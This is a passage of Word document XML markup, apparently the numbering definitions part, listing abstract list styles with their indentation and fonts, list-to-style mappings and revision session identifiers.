      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2484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3204" w:firstLine="2520"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3924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4644" w:firstLine="5400"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5364" w:firstLine="6840"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6084" w:firstLine="8280"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6804" w:firstLine="9720"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7524" w:firstLine="11160"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="8244" w:firstLine="12600"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12">
    <w:nsid w:val="249F2E4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F2F230"/>
    <w:lvl w:ilvl="0" w:tplc="0416000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2844" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3564" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4284" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5004" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5724" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6444" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7164" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7884" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0416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13">
    <w:nsid w:val="366B7375"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC46D30C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7"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1821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3128" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="377721E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3A4E7B2E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16">
    <w:nsid w:val="3AC02726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17">
    <w:nsid w:val="3B67193B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18">
    <w:nsid w:val="41BD29EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D522F06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2"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1821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96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384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8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9576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135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2768" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19">
    <w:nsid w:val="438B6AB6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0D388D42"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:legacy w:legacy="1" w:legacySpace="0" w:legacyIndent="0"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20">
    <w:nsid w:val="43F41D98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21">
    <w:nsid w:val="45115102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22">
    <w:nsid w:val="4A3B0464"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1722B0B4"/>
    <w:lvl w:ilvl="0" w:tplc="0416001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2868" w:hanging="18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CC31F6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F2F230"/>
    <w:lvl w:ilvl="0" w:tplc="0416000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2844" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3564" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4284" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5004" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5724" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6444" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7164" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7884" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0416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24">
    <w:nsid w:val="4F327E34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9FDEA464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1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="405" w:hanging="405"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:sz w:val="28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ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:sz w:val="28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ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:sz w:val="28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ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:sz w:val="28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ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:sz w:val="28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ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:sz w:val="28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ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b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ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25">
    <w:nsid w:val="50632F5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAEE1C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10168D0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27">
    <w:nsid w:val="588E0977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28">
    <w:nsid w:val="5A734930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29">
    <w:nsid w:val="5BA05F1D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30">
    <w:nsid w:val="62C448D7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6DFE3EEE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31">
    <w:nsid w:val="63B0132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>
    <w:nsid w:val="66035B30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2774EF72"/>
    <w:lvl w:ilvl="0" w:tplc="117C49D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3228" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"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3948" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4668" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5388" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6108" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6828" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7548" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8268" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="8988" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33">
    <w:nsid w:val="68F83A59"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="32D4740A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:legacy w:legacy="1" w:legacySpace="0" w:legacyIndent="0"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34">
    <w:nsid w:val="6F0A1872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35">
    <w:nsid w:val="700654C4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6DFE3EEE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36">
    <w:nsid w:val="705F4B79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B28E83F2"/>
    <w:lvl w:ilvl="0" w:tplc="B6AA1122">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2484" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"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3204" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3924" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4644" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5364" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6084" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6804" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7524" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0416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37">
    <w:nsid w:val="71AE6997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38">
    <w:nsid w:val="789137E5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6DFE3EEE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39">
    <w:nsid w:val="7A6F4945"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D382AA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AE62768"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7CA1E42"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1068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788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508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3228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948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668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388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6108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828" w:firstLine="6120"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41">
    <w:nsid w:val="7B9853A0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42">
    <w:nsid w:val="7D5624C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC4475C4"/>
    <w:lvl w:ilvl="0" w:tplc="0416000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3408" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4128" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4848" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5568" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6288" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7008" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7728" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8448" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="9168" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="43">
    <w:nsid w:val="7F0836C9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num w:numId="1">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="1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 w:numId="19">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="44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56AB"/>
    <w:rsid w:val="00015DE3"/>
    <w:rsid w:val="00022ED2"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001C4F4D"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="00236FDF"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="00337476"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005A5292"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="00654DEF"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006D73FC"/>
    <w:rsid w:val="006F6948"/>
    <w:rsid w:val="006F6982"/>
    <w:rsid w:val="00702C53"/>
    <w:rsid w:val="0070782B"/>
    <w:rsid w:val="00736DBC"/>
    <w:rsid w:val="00751591"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A79EE"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="008D0530"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="009A2041"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B71318"/>
